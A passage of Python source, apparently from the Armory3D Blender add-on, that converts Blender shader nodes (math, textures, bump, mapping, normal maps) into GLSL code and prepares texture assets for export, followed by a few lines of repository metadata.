parse_value_input(node.inputs[2]) return 'hsv_to_rgb(vec3({0}, {1}, {2}))'.format(h,s,v) elif node.type == 'COMBRGB': r = parse_value_input(node.inputs[0]) g = parse_value_input(node.inputs[1]) b = parse_value_input(node.inputs[2]) return 'vec3({0}, {1}, {2})'.format(r, g, b) elif node.type == 'WAVELENGTH': curshader.add_function(c_functions.str_wavelength_to_rgb) wl = parse_value_input(node.inputs[0]) # Roughly map to cycles - 450 to 600 nanometers return 'wavelength_to_rgb(({0} - 450.0) / 150.0)'.format(wl) # Vector elif node.type == 'CAMERA': # View Vector in camera space return 'vVecCam' elif node.type == 'NEW_GEOMETRY': if socket == node.outputs[0]: # Position return 'wposition' elif socket == node.outputs[1]: # Normal return 'n' if curshader.shader_type == 'frag' else 'wnormal' elif socket == node.outputs[2]: # Tangent return 'wtangent' elif socket == node.outputs[3]: # True Normal return 'n' if curshader.shader_type == 'frag' else 'wnormal' elif socket == node.outputs[4]: # Incoming return 'vVec' elif socket == node.outputs[5]: # Parametric return 'mposition' elif node.type == 'HAIR_INFO': return 'vec3(0.0)' # Tangent Normal elif node.type == 'OBJECT_INFO': return 'wposition' elif node.type == 'PARTICLE_INFO': if socket == node.outputs[3]: # Location particle_info['location'] = True return 'p_location' if arm.utils.get_rp().arm_particles == 'On' else 'vec3(0.0)' elif socket == node.outputs[5]: # Velocity particle_info['velocity'] = True return 'p_velocity' if arm.utils.get_rp().arm_particles == 'On' else 'vec3(0.0)' elif socket == node.outputs[6]: # Angular Velocity particle_info['angular_velocity'] = True return 'vec3(0.0)' elif node.type == 'TANGENT': return 'wtangent' elif node.type == 'TEX_COORD': #obj = node.object #instance = node.from_instance if socket == node.outputs[0]: # Generated - bounds return 'bposition' elif socket == node.outputs[1]: # Normal return 'n' elif socket == node.outputs[2]: # UV con.add_elem('tex', 'short2norm') return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)' elif socket == node.outputs[3]: # Object return 'mposition' elif socket == node.outputs[4]: # Camera return 'vec3(0.0)' # 'vposition' elif socket == node.outputs[5]: # Window return 'vec3(0.0)' # 'wvpposition' elif socket == node.outputs[6]: # Reflection return 'vec3(0.0)' elif node.type == 'UVMAP': #instance = node.from_instance con.add_elem('tex', 'short2norm') mat = mat_get_material() mat_users = mat_get_material_users() if mat_users != None and mat in mat_users: mat_user = mat_users[mat][0] if hasattr(mat_user.data, 'uv_layers'): lays = mat_user.data.uv_layers # Second uvmap referenced if len(lays) > 1 and node.uv_map == lays[1].name: con.add_elem('tex1', 'short2norm') return 'vec3(texCoord1.x, 1.0 - texCoord1.y, 0.0)' return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)' elif node.type == 'BUMP': # Interpolation strength strength = parse_value_input(node.inputs[0]) # Height multiplier # distance = parse_value_input(node.inputs[1]) sample_bump = True height = parse_value_input(node.inputs[2]) sample_bump = False nor = parse_vector_input(node.inputs[3]) if sample_bump_res != '': if node.invert: ext = ['1', '2', '3', '4'] else: ext = ['2', '1', '4', '3'] curshader.write('float {0}_fh1 = {0}_{1} - {0}_{2}; float {0}_fh2 = {0}_{3} - {0}_{4};'.format(sample_bump_res, ext[0], ext[1], ext[2], ext[3])) curshader.write('{0}_fh1 *= ({1}) * 3.0; {0}_fh2 *= ({1}) * 3.0;'.format(sample_bump_res, strength)) curshader.write('vec3 {0}_a = normalize(vec3(2.0, 0.0, {0}_fh1));'.format(sample_bump_res)) curshader.write('vec3 {0}_b = normalize(vec3(0.0, 2.0, {0}_fh2));'.format(sample_bump_res)) res = 'normalize(mat3({0}_a, {0}_b, normalize(vec3({0}_fh1, {0}_fh2, 2.0))) * n)'.format(sample_bump_res) sample_bump_res = '' else: res = 'n' return res elif node.type == 'MAPPING': out = parse_vector_input(node.inputs[0]) scale = node.inputs['Scale'].default_value rotation = node.inputs['Rotation'].default_value location = node.inputs['Location'].default_value if node.inputs['Location'].enabled else [0.0, 0.0, 0.0] if scale[0] != 1.0 or scale[1] != 1.0 or scale[2] != 1.0: out = '({0} * vec3({1}, {2}, {3}))'.format(out, scale[0], scale[1], scale[2]) if rotation[2] != 0.0: # ZYX rotation, Z axis for now.. a = rotation[2] # x * cos(theta) - y * sin(theta) # x * sin(theta) + y * cos(theta) out = 'vec3({0}.x * {1} - ({0}.y) * {2}, {0}.x * {2} + ({0}.y) * {1}, 0.0)'.format(out, math.cos(a), math.sin(a)) # if node.rotation[1] != 0.0: # a = node.rotation[1] # out = 'vec3({0}.x * {1} - {0}.z * {2}, {0}.x * {2} + {0}.z * {1}, 0.0)'.format(out, math.cos(a), math.sin(a)) # if node.rotation[0] != 0.0: # a = node.rotation[0] # out = 'vec3({0}.y * {1} - {0}.z * {2}, {0}.y * {2} + {0}.z * {1}, 0.0)'.format(out, math.cos(a), math.sin(a)) if location[0] != 0.0 or location[1] != 0.0 or location[2] != 0.0: out = '({0} + vec3({1}, {2}, {3}))'.format(out, location[0], location[1], location[2]) # use Extension parameter from the Texture node instead # if node.use_min: # out = 'max({0}, vec3({1}, {2}, {3}))'.format(out, node.min[0], node.min[1]) # if node.use_max: # out = 'min({0}, vec3({1}, {2}, {3}))'.format(out, node.max[0], node.max[1]) return out elif node.type == 'NORMAL': if socket == node.outputs[0]: return to_vec3(node.outputs[0].default_value) elif socket == node.outputs[1]: # TODO: is parse_value path preferred? nor = parse_vector_input(node.inputs[0]) return 'vec3(dot({0}, {1}))'.format(to_vec3(node.outputs[0].default_value), nor) elif node.type == 'NORMAL_MAP': if curshader == tese: return parse_vector_input(node.inputs[1]) else: #space = node.space #map = node.uv_map # Color parse_normal_map_color_input(node.inputs[1], node.inputs[0]) return None elif node.type == 'VECT_TRANSFORM': #type = node.vector_type #conv_from = node.convert_from #conv_to = node.convert_to # Pass throuh return parse_vector_input(node.inputs[0]) elif node.type == 'COMBXYZ': x = parse_value_input(node.inputs[0]) y = parse_value_input(node.inputs[1]) z = parse_value_input(node.inputs[2]) return 'vec3({0}, {1}, {2})'.format(x, y, z) elif node.type == 'VECT_MATH': vec1 = parse_vector_input(node.inputs[0]) vec2 = parse_vector_input(node.inputs[1]) op = node.operation if op == 'ADD': return '({0} + {1})'.format(vec1, vec2) elif op == 'SUBTRACT': return '({0} - {1})'.format(vec1, vec2) elif op == 'AVERAGE': return '(({0} + {1}) / 2.0)'.format(vec1, vec2) elif op == 'DOT_PRODUCT': return 'vec3(dot({0}, {1}))'.format(vec1, vec2) elif op == 'CROSS_PRODUCT': return 'cross({0}, {1})'.format(vec1, vec2) elif op == 'NORMALIZE': return 'normalize({0})'.format(vec1) elif node.type == 'DISPLACEMENT': height = parse_value_input(node.inputs[0]) midlevel = parse_value_input(node.inputs[1]) scale = parse_value_input(node.inputs[2]) nor = parse_vector_input(node.inputs[3]) return '(vec3({0}) * {1})'.format(height, scale) def parse_normal_map_color_input(inp, strength_input=None): global normal_parsed global frag if basecol_only: return if inp.is_linked == False: return if normal_parsed: return normal_parsed = True frag.write_normal += 1 if not get_arm_export_tangents() or mat_get_material().arm_decal: # Compute TBN matrix frag.write('vec3 texn = ({0}) * 2.0 - 1.0;'.format(parse_vector_input(inp))) frag.write('texn.y = -texn.y;') frag.add_include('std/normals.glsl') frag.write('mat3 TBN = cotangentFrame(n, -vVec, texCoord);') frag.write('n = TBN * normalize(texn);') else: frag.write('vec3 n = ({0}) * 2.0 - 1.0;'.format(parse_vector_input(inp))) if strength_input != None: strength = parse_value_input(strength_input) if strength != '1.0': frag.write('n.xy *= {0};'.format(strength)) frag.write('n = normalize(TBN * n);') con.add_elem('tang', 'short4norm') frag.write_normal -= 1 def parse_value_input(inp): if inp.is_linked: l = inp.links[0] if l.from_node.type == 'REROUTE': return parse_value_input(l.from_node.inputs[0]) res_var = write_result(l) st = l.from_socket.type if st == 'RGB' or st == 'RGBA' or st == 'VECTOR': return '{0}.x'.format(res_var) else: # VALUE return res_var else: if mat_batch() and inp.is_uniform: return to_uniform(inp) else: return to_vec1(inp.default_value) def parse_value(node, socket): global particle_info global sample_bump if node.type == 'GROUP': if node.node_tree.name.startswith('Armory PBR'): # Displacement if socket == node.outputs[1]: return parse_value_input(node.inputs[7]) else: return None else: return parse_group(node, socket) elif node.type == 'GROUP_INPUT': return parse_group_input(node, socket) elif node.type == 'ATTRIBUTE': # Pass time till drivers are implemented if node.attribute_name == 'time': curshader.add_uniform('float time', link='_time') return 'time' else: return '0.0' elif node.type == 'CAMERA': # View Z Depth if socket == node.outputs[1]: curshader.add_include('std/math.glsl') curshader.add_uniform('vec2 cameraProj', link='_cameraPlaneProj') return 'linearize(gl_FragCoord.z, cameraProj)' # View Distance else: curshader.add_uniform('vec3 eye', link='_cameraPosition') return 'distance(eye, wposition)' elif node.type == 'FRESNEL': curshader.add_function(c_functions.str_fresnel) ior = parse_value_input(node.inputs[0]) if node.inputs[1].is_linked: dotnv = 'dot({0}, vVec)'.format(parse_vector_input(node.inputs[1])) else: dotnv = 'dotNV' return 'fresnel({0}, {1})'.format(ior, dotnv) elif node.type == 'NEW_GEOMETRY': if socket == node.outputs[6]: # Backfacing return '(1.0 - float(gl_FrontFacing))' elif socket == node.outputs[7]: # Pointiness return '0.0' elif node.type == 'HAIR_INFO': # Is Strand # Intercept # Thickness return '0.5' elif node.type == 'LAYER_WEIGHT': blend = parse_value_input(node.inputs[0]) if node.inputs[1].is_linked: dotnv = 'dot({0}, vVec)'.format(parse_vector_input(node.inputs[1])) else: dotnv = 'dotNV' if socket == node.outputs[0]: # Fresnel curshader.add_function(c_functions.str_fresnel) return 'fresnel(1.0 / (1.0 - {0}), {1})'.format(blend, dotnv) elif socket == node.outputs[1]: # Facing return '(1.0 - pow({0}, ({1} < 0.5) ? 2.0 * {1} : 0.5 / (1.0 - {1})))'.format(dotnv, blend) elif node.type == 'LIGHT_PATH': if socket == node.outputs[0]: # Is Camera Ray return '1.0' elif socket == node.outputs[1]: # Is Shadow Ray return '0.0' elif socket == node.outputs[2]: # Is Diffuse Ray return '1.0' elif socket == node.outputs[3]: # Is Glossy Ray return '1.0' elif socket == node.outputs[4]: # Is Singular Ray return '0.0' elif socket == node.outputs[5]: # Is Reflection Ray return '0.0' elif socket == node.outputs[6]: # Is Transmission Ray return '0.0' elif socket == node.outputs[7]: # Ray Length return '0.0' elif socket == node.outputs[8]: # Ray Depth return '0.0' elif socket == node.outputs[9]: # Transparent Depth return '0.0' elif socket == node.outputs[10]: # Transmission Depth return '0.0' elif node.type == 'OBJECT_INFO': if socket == node.outputs[2]: # Object Index curshader.add_uniform('float objectInfoIndex', link='_objectInfoIndex') return 'objectInfoIndex' elif socket == node.outputs[3]: # Material Index curshader.add_uniform('float objectInfoMaterialIndex', link='_objectInfoMaterialIndex') return 'objectInfoMaterialIndex' elif socket == node.outputs[4]: # Random curshader.add_uniform('float objectInfoRandom', link='_objectInfoRandom') return 'objectInfoRandom' elif node.type == 'PARTICLE_INFO': if socket == node.outputs[0]: # Index particle_info['index'] = True return 'p_index' if arm.utils.get_rp().arm_particles == 'On' else '0.0' elif socket == node.outputs[1]: # Age particle_info['age'] = True return 'p_age' if arm.utils.get_rp().arm_particles == 'On' else '0.0' elif socket == node.outputs[2]: # Lifetime particle_info['lifetime'] = True return 'p_lifetime' if arm.utils.get_rp().arm_particles == 'On' else '0.0' elif socket == node.outputs[4]: # Size particle_info['size'] = True return '1.0' elif node.type == 'VALUE': if node.arm_material_param: nn = 'param_' + node_name(node.name) curshader.add_uniform('float {0}'.format(nn), link='{0}'.format(node.name)) return nn else: return to_vec1(node.outputs[0].default_value) elif node.type == 'WIREFRAME': #node.use_pixel_size # size = parse_value_input(node.inputs[0]) return '0.0' elif node.type == 'TEX_BRICK': curshader.add_function(c_functions.str_tex_brick) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[4]) res = 'tex_brick_f({0} * {1})'.format(co, scale) if sample_bump: write_bump(node, res) return res elif node.type == 'TEX_CHECKER': curshader.add_function(c_functions.str_tex_checker) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[3]) res = 'tex_checker_f({0}, {1})'.format(co, scale) if sample_bump: write_bump(node, res) return res elif node.type == 'TEX_GRADIENT': if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' grad = node.gradient_type if grad == 'LINEAR': f = '{0}.x'.format(co) elif grad == 'QUADRATIC': f = '0.0' elif grad == 'EASING': f = '0.0' elif grad == 'DIAGONAL': f = '({0}.x + {0}.y) * 0.5'.format(co) elif grad == 'RADIAL': f = 'atan({0}.y, {0}.x) / PI2 + 0.5'.format(co) elif grad == 'QUADRATIC_SPHERE': f = '0.0' elif grad == 'SPHERICAL': f = 'max(1.0 - sqrt({0}.x * {0}.x + {0}.y * {0}.y + {0}.z * {0}.z), 0.0)'.format(co) res = '(clamp({0}, 0.0, 1.0))'.format(f) if sample_bump: write_bump(node, res) return res elif node.type == 'TEX_IMAGE': # Already fetched if is_parsed(store_var_name(node)): return '{0}.a'.format(store_var_name(node)) tex_name = safesrc(node.name) tex = make_texture(node, tex_name) tex_link = node.name if node.arm_material_param else None if tex != None: curshader.write_textures += 1 res = '{0}.a'.format(texture_store(node, tex, tex_name, tex_link=tex_link)) curshader.write_textures -= 1 return res elif node.image == None: # Empty texture tex = {} tex['name'] = tex_name tex['file'] = '' return '{0}.a'.format(texture_store(node, tex, tex_name, True, tex_link=tex_link)) else: tex_store = store_var_name(node) # Pink color for missing texture curshader.write('vec4 {0} = vec4(1.0, 0.0, 1.0, 1.0);'.format(tex_store)) return '{0}.a'.format(tex_store) elif node.type == 'TEX_MAGIC': curshader.add_function(c_functions.str_tex_magic) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[1]) res = 'tex_magic_f({0} * {1} * 4.0)'.format(co, scale) if sample_bump: write_bump(node, res, 0.1) return res elif node.type == 'TEX_MUSGRAVE': # Fall back to noise curshader.add_function(c_functions.str_tex_musgrave) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[1]) # detail = parse_value_input(node.inputs[2]) # distortion = parse_value_input(node.inputs[3]) res = 'tex_musgrave_f({0} * {1} * 0.5)'.format(co, scale) if sample_bump: write_bump(node, res) return res elif node.type == 'TEX_NOISE': curshader.add_function(c_functions.str_tex_noise) assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png') assets_add_embedded_data('noise256.png') curshader.add_uniform('sampler2D snoise256', link='$noise256.png') if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[1]) # detail = parse_value_input(node.inputs[2]) # distortion = parse_value_input(node.inputs[3]) res = 'tex_noise({0} * {1})'.format(co, scale) if sample_bump: write_bump(node, res, 0.1) return res elif node.type == 'TEX_POINTDENSITY': return '0.0' elif node.type == 'TEX_VORONOI': curshader.add_function(c_functions.str_tex_voronoi) assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png') assets_add_embedded_data('noise256.png') curshader.add_uniform('sampler2D snoise256', link='$noise256.png') if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[1]) if node.coloring == 'INTENSITY': res = 'tex_voronoi({0} * {1}).a'.format(co, scale) else: # CELLS res = 'tex_voronoi({0} * {1}).r'.format(co, scale) if sample_bump: write_bump(node, res) return res elif node.type == 'TEX_WAVE': curshader.add_function(c_functions.str_tex_wave) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[1]) res = 'tex_wave_f({0} * {1})'.format(co, scale) if sample_bump: write_bump(node, res) return res elif node.type == 'LIGHT_FALLOFF': # Constant, linear, quadratic # Shaders default to quadratic for now return '1.0' elif node.type == 'NORMAL': nor = parse_vector_input(node.inputs[0]) return 'dot({0}, {1})'.format(to_vec3(node.outputs[0].default_value), nor) elif node.type == 'VALTORGB': # ColorRamp return '1.0' elif node.type == 'MATH': val1 = parse_value_input(node.inputs[0]) val2 = parse_value_input(node.inputs[1]) op = node.operation if op == 'ADD': out_val = '({0} + {1})'.format(val1, val2) elif op == 'SUBTRACT': out_val = '({0} - {1})'.format(val1, val2) elif op == 'MULTIPLY': out_val = '({0} * {1})'.format(val1, val2) elif op == 'DIVIDE': out_val = '({0} / {1})'.format(val1, val2) elif op == 'POWER': out_val = 'pow({0}, {1})'.format(val1, val2) elif op == 'LOGARITHM': out_val = 'log({0})'.format(val1) elif op == 'SQRT': out_val = 'sqrt({0})'.format(val1) elif op == 'ABSOLUTE': out_val = 'abs({0})'.format(val1) elif op == 'MINIMUM': out_val = 'min({0}, {1})'.format(val1, val2) elif op == 'MAXIMUM': out_val = 'max({0}, {1})'.format(val1, val2) elif op == 'LESS_THAN': out_val = 'float({0} < {1})'.format(val1, val2) elif op == 'GREATER_THAN': out_val = 'float({0} > {1})'.format(val1, val2) elif op == 'ROUND': # out_val = 'round({0})'.format(val1) out_val = 'floor({0} + 0.5)'.format(val1) elif op == 'FLOOR': out_val = 'floor({0})'.format(val1) elif op == 'CEIL': out_val = 'ceil({0})'.format(val1) elif op == 'FRACT': out_val = 'fract({0})'.format(val1) elif op == 'MODULO': # out_val = 'float({0} % {1})'.format(val1, val2) out_val = 'mod({0}, {1})'.format(val1, val2) elif op == 'SINE': out_val = 'sin({0})'.format(val1) elif op == 'COSINE': out_val = 'cos({0})'.format(val1) elif op == 'TANGENT': out_val = 'tan({0})'.format(val1) elif op == 'ARCSINE': out_val = 'asin({0})'.format(val1) elif op == 'ARCCOSINE': out_val = 'acos({0})'.format(val1) elif op == 'ARCTANGENT': out_val = 'atan({0})'.format(val1) elif op == 'ARCTAN2': out_val = 'atan({0}, {1})'.format(val1, val2) if node.use_clamp: return 'clamp({0}, 0.0, 1.0)'.format(out_val) else: return out_val elif node.type == 'RGBTOBW': col = parse_vector_input(node.inputs[0]) return '((({0}.r * 0.3 + {0}.g * 0.59 + {0}.b * 0.11) / 3.0) * 2.5)'.format(col) elif node.type == 'SEPHSV': return '0.0' elif node.type == 'SEPRGB': col = parse_vector_input(node.inputs[0]) if socket == node.outputs[0]: return '{0}.r'.format(col) elif socket == node.outputs[1]: return '{0}.g'.format(col) elif socket == node.outputs[2]: return '{0}.b'.format(col) elif node.type == 'SEPXYZ': vec = parse_vector_input(node.inputs[0]) if socket == node.outputs[0]: return '{0}.x'.format(vec) elif socket == node.outputs[1]: return '{0}.y'.format(vec) elif socket == node.outputs[2]: return '{0}.z'.format(vec) elif node.type == 'VECT_MATH': vec1 = parse_vector_input(node.inputs[0]) vec2 = parse_vector_input(node.inputs[1]) op = node.operation if op == 'DOT_PRODUCT': return 'dot({0}, {1})'.format(vec1, vec2) else: return '0.0' ## def vector_curve(name, fac, points): # Write Ys array ys_var = name + '_ys' curshader.write('float {0}[{1}];'.format(ys_var, len(points))) # TODO: Make const for i in range(0, len(points)): curshader.write('{0}[{1}] = {2};'.format(ys_var, i, points[i].location[1])) # Get index fac_var = name + '_fac' curshader.write('float {0} = {1};'.format(fac_var, fac)) index = '0' for i in range(1, len(points)): index += ' + ({0} > {1} ? 1 : 0)'.format(fac_var, points[i].location[0]) # Write index index_var = name + '_i' curshader.write('int {0} = {1};'.format(index_var, index)) # Linear # Write Xs array facs_var = name + '_xs' curshader.write('float {0}[{1}];'.format(facs_var, len(points))) # TODO: Make const for i in range(0, len(points)): curshader.write('{0}[{1}] = {2};'.format(facs_var, i, points[i].location[0])) # Map vector return 'mix({0}[{1}], {0}[{1} + 1], ({2} - {3}[{1}]) * (1.0 / ({3}[{1} + 1] - {3}[{1}]) ))'.format(ys_var, index_var, fac_var, facs_var) def write_normal(inp): if inp.is_linked and inp.links[0].from_node.type != 'GROUP_INPUT': normal_res = parse_vector_input(inp) if normal_res != None: curshader.write('n = {0};'.format(normal_res)) def is_parsed(s): global parsed return s in parsed def res_var_name(node, socket): return node_name(node.name) + '_' + safesrc(socket.name) + '_res' def write_result(l): global parsed res_var = res_var_name(l.from_node, l.from_socket) # Unparsed node if not is_parsed(res_var): parsed[res_var] = True st = l.from_socket.type if st == 'RGB' or st == 'RGBA' or st == 'VECTOR': res = parse_vector(l.from_node, l.from_socket) if res == None: return None curshader.write('vec3 {0} = {1};'.format(res_var, res)) elif st == 'VALUE': res = parse_value(l.from_node, l.from_socket) if res == None: return None curshader.write('float {0} = {1};'.format(res_var, res)) # Normal map already parsed, return elif l.from_node.type == 'NORMAL_MAP': return None return res_var def glsl_type(t): if t == 'RGB' or t == 'RGBA' or t == 'VECTOR': return 'vec3' else: return 'float' def to_uniform(inp): uname = safesrc(inp.node.name) + safesrc(inp.name) curshader.add_uniform(glsl_type(inp.type) + ' ' + uname) return uname def store_var_name(node): return node_name(node.name) + '_store' def texture_store(node, tex, tex_name, to_linear=False, tex_link=None): global sample_bump global sample_bump_res global parsed tex_store = store_var_name(node) if is_parsed(tex_store): return tex_store parsed[tex_store] = True mat_bind_texture(tex) con.add_elem('tex', 'short2norm') curshader.add_uniform('sampler2D {0}'.format(tex_name), link=tex_link) if node.inputs[0].is_linked: uv_name = parse_vector_input(node.inputs[0]) uv_name = 'vec2({0}.x, 1.0 - {0}.y)'.format(uv_name) else: uv_name = 'texCoord' triplanar = node.projection == 'BOX' if triplanar: curshader.write(f'vec3 texCoordBlend = vec3(0.0); vec2 {uv_name}1 = vec2(0.0); vec2 {uv_name}2 = vec2(0.0);') # Temp curshader.write(f'vec4 {tex_store} = vec4(0.0, 0.0, 0.0, 0.0);') curshader.write(f'if (texCoordBlend.x > 0) {tex_store} += texture({tex_name}, {uv_name}.xy) * texCoordBlend.x;') curshader.write(f'if (texCoordBlend.y > 0) {tex_store} += texture({tex_name}, {uv_name}1.xy) * texCoordBlend.y;') curshader.write(f'if (texCoordBlend.z > 0) {tex_store} += texture({tex_name}, {uv_name}2.xy) * texCoordBlend.z;') else: if mat_texture_grad(): curshader.write('vec4 {0} = textureGrad({1}, {2}.xy, g2.xy, g2.zw);'.format(tex_store, tex_name, uv_name)) else: curshader.write('vec4 {0} = texture({1}, {2}.xy);'.format(tex_store, tex_name, uv_name)) if sample_bump: sample_bump_res = tex_store curshader.write('float {0}_1 = textureOffset({1}, {2}.xy, ivec2(-2, 0)).r;'.format(tex_store, tex_name, uv_name)) curshader.write('float {0}_2 = textureOffset({1}, {2}.xy, ivec2(2, 0)).r;'.format(tex_store, tex_name, uv_name)) curshader.write('float {0}_3 = textureOffset({1}, {2}.xy, ivec2(0, -2)).r;'.format(tex_store, tex_name, uv_name)) curshader.write('float {0}_4 = textureOffset({1}, {2}.xy, ivec2(0, 2)).r;'.format(tex_store, tex_name, uv_name)) sample_bump = False if to_linear: curshader.write('{0}.rgb = pow({0}.rgb, vec3(2.2));'.format(tex_store)) return tex_store def write_bump(node, res, scl=0.001): global sample_bump global sample_bump_res sample_bump_res = store_var_name(node) + '_bump' # Testing.. get function parts.. ar = res.split('(', 1) pre = ar[0] + '(' if ',' in ar[1]: ar2 = ar[1].split(',', 1) co = ar2[0] post = ',' + ar2[1] else: co = ar[1][:-1] post = ')' curshader.write('float {0}_1 = {1}{2} + vec3(-{4}, 0.0, 0.0){3};'.format(sample_bump_res, pre, co, post, scl)) curshader.write('float {0}_2 = {1}{2} + vec3({4}, 0.0, {4}){3};'.format(sample_bump_res, pre, co, post, scl)) curshader.write('float {0}_3 = {1}{2} + vec3(0.0, -{4}, 0.0){3};'.format(sample_bump_res, pre, co, post, scl)) curshader.write('float {0}_4 = {1}{2} + vec3(0.0, {4}, -{4}){3};'.format(sample_bump_res, pre, co, post, scl)) sample_bump = False def to_vec1(v): return str(v) def to_vec3(v): return 'vec3({0}, {1}, {2})'.format(v[0], v[1], v[2]) def node_by_type(nodes, ntype): for n in nodes: if n.type == ntype: return n def socket_index(node, socket): for i in range(0, len(node.outputs)): if node.outputs[i] == socket: return i def node_name(s): for p in parents: s = p.name + '_' + s if curshader.write_textures > 0: s += '_texread' s = safesrc(s) if '__' in s: # Consecutive _ are reserved s = s.replace('_', '_x') return s ## def make_texture(image_node, tex_name, matname=None): tex = {} tex['name'] = tex_name image = image_node.image if matname is None: matname = mat_state.material.name if image is None: return None # Get filepath filepath = image.filepath if filepath == '': if image.packed_file is not None: filepath = './' + image.name has_ext = filepath.endswith(('.jpg', '.png', '.hdr')) if not has_ext: # Raw bytes, write converted .jpg to /unpacked filepath += '.raw' elif image.source == "GENERATED": unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked') if not os.path.exists(unpack_path): os.makedirs(unpack_path) filepath = os.path.join(unpack_path, image.name + ".jpg") arm.utils.convert_image(image, filepath, "JPEG") else: arm.log.warn(matname + '/' + image.name + ' - invalid file path') return None # Reference image name texpath = arm.utils.asset_path(filepath) texfile = arm.utils.extract_filename(filepath) tex['file'] = arm.utils.safestr(texfile) s = tex['file'].rsplit('.', 1) if len(s) == 1: arm.log.warn(matname + '/' + image.name + ' - file extension required for image name') return None ext = s[1].lower() do_convert = ext not in ('jpg', 'png', 'hdr', 'mp4') # Convert image if do_convert: new_ext = 'png' if (ext in ('tga', 'dds')) else 'jpg' tex['file'] = tex['file'].rsplit('.', 1)[0] + '.' + new_ext if image.packed_file is not None or not is_ascii(texfile): # Extract packed data / copy non-ascii texture unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked') if not os.path.exists(unpack_path): os.makedirs(unpack_path) unpack_filepath = os.path.join(unpack_path, tex['file']) if do_convert: if not os.path.isfile(unpack_filepath): fmt = 'PNG' if new_ext == 'png' else 'JPEG' arm.utils.convert_image(image, unpack_filepath, file_format=fmt) else: # Write bytes if size is different or file does not exist yet if image.packed_file is not None: if not os.path.isfile(unpack_filepath) or os.path.getsize(unpack_filepath) != image.packed_file.size: with open(unpack_filepath, 'wb') as f: f.write(image.packed_file.data) # Copy non-ascii texture else: if not os.path.isfile(unpack_filepath) or os.path.getsize(unpack_filepath) != os.path.getsize(texpath): shutil.copy(texpath, unpack_filepath) arm.assets.add(unpack_filepath) else: if not os.path.isfile(arm.utils.asset_path(filepath)): arm.log.warn('Material ' + matname + '/' + image.name + ' - file not found(' + filepath + ')') return None if do_convert: unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked') if not os.path.exists(unpack_path): os.makedirs(unpack_path) converted_path = os.path.join(unpack_path, tex['file']) # TODO: delete cache when file changes if not os.path.isfile(converted_path): fmt = 'PNG' if new_ext == 'png' else 'JPEG' arm.utils.convert_image(image, converted_path, file_format=fmt) arm.assets.add(converted_path) else: # Link image path to assets # TODO: Khamake converts .PNG to .jpg? Convert ext to lowercase on windows if arm.utils.get_os() == 'win': s = filepath.rsplit('.', 1) arm.assets.add(arm.utils.asset_path(s[0] + '.' + s[1].lower())) else: arm.assets.add(arm.utils.asset_path(filepath)) # if image_format != 'RGBA32': # tex['format'] = image_format interpolation = image_node.interpolation rpdat = arm.utils.get_rp() texfilter = rpdat.arm_texture_filter if texfilter == 'Anisotropic': interpolation = 'Smart' elif texfilter == 'Linear': interpolation = 'Linear' elif texfilter == 'Point': interpolation = 'Closest' # TODO: Blender seems to load full images on size request, cache size instead powimage = is_pow(image.size[0]) and is_pow(image.size[1]) if interpolation == 'Cubic': # Mipmap linear tex['mipmap_filter'] = 'linear' tex['generate_mipmaps'] = True elif interpolation == 'Smart': # Mipmap anisotropic tex['min_filter'] = 'anisotropic' tex['mipmap_filter'] = 'linear' tex['generate_mipmaps'] = True elif interpolation == 'Closest': tex['min_filter'] = 'point' tex['mag_filter'] = 'point' # else defaults to linear if image_node.extension != 'REPEAT': # Extend or clip tex['u_addressing'] = 'clamp' tex['v_addressing'] = 'clamp' if image.source == 'MOVIE': tex['source'] = 'movie' tex['min_filter'] = 'linear' tex['mag_filter'] = 'linear' tex['mipmap_filter'] = 'no' tex['generate_mipmaps'] = False return tex def is_pow(num): return ((num & (num - 1)) == 0) and num != 0 def is_ascii(s): return len(s) == len(s.encode()) ## def get_rp_renderer(): return arm.utils.get_rp().rp_renderer def get_arm_export_tangents(): return bpy.data.worlds['Arm'].arm_export_tangents def safesrc(name): return arm.utils.safesrc(name) def get_sdk_path(): return arm.utils.get_sdk_path() def disp_enabled(): return arm.utils.disp_enabled(arm.make_state.target) def warn(text): arm.log.warn(text) def assets_add(path): arm.assets.add(path) def assets_add_embedded_data(path): arm.assets.add_embedded_data(path) def mat_name(): return mat_state.material.name def mat_batch(): return mat_state.batch def mat_bind_texture(tex): mat_state.bind_textures.append(tex) def mat_texture_grad(): return mat_state.texture_grad def mat_get_material(): return mat_state.material def mat_get_material_users(): return mat_state.mat_users
39.207601
185
0.567568
0
0
0
0
0
0
0
0
16,641
0.240745
4c4ffee559cb6b71ce9c01f453a956254f1cdb8a
9,981
py
Python
src/config.py
Jizanator/botty
3026de0d4c03f4e797ed92dedb8fdfdf9cf1462e
[ "MIT" ]
null
null
null
src/config.py
Jizanator/botty
3026de0d4c03f4e797ed92dedb8fdfdf9cf1462e
[ "MIT" ]
null
null
null
src/config.py
Jizanator/botty
3026de0d4c03f4e797ed92dedb8fdfdf9cf1462e
[ "MIT" ]
null
null
null
